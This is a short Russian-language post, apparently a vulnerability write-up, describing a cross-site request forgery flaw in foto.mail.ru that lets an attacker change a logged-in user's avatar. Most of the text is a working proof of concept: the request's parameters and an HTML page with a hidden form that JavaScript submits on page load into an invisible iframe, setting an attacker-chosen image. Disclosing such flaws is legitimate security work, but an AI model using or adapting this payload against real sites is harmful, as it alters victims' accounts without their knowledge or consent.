XSRF уязвимость позволяет атакующему изменить основное фото (аватару) пользователя.
Создаётся специальный HTML файл с формой и с использованием JavaScript.
Образец запроса:
| URL: | http://foto.mail.ru/cgi-bin/photo/addphoto |
| Метод: | POST |
| Кодировка: | Windows-1251 |
| Поля запроса: |
| myphoto | 1 |
| kavt | 1 |
| add | 1 |
| upload_by | URL |
| Поля формы: |
| upl-sw | url |
| URL | Ссылка на изображение |
Образец HTML кода, использующего эту уязвимость:
Code
<form id="avatarko" method="POST" target="ava_to" action="http://foto.mail.ru/cgi-bin/photo/addphoto?myphoto=1&kavt=1&add=1&upload_by=URL">
<input type="hidden" name="upl-sw" value="url">
<input type="hidden" name="URL" value="http://realfijinews.files.wordpress.com/2009/09/obamaspeaking.jpg">
<input type="submit" value="Submit">
</form>
<iframe name="ava_to" width="0" height="0" scrolling="no" frameborder="0"></iframe>
<script type="text/javascript">
document.getElementById('avatarko').submit();
</script>
Загружаем... 
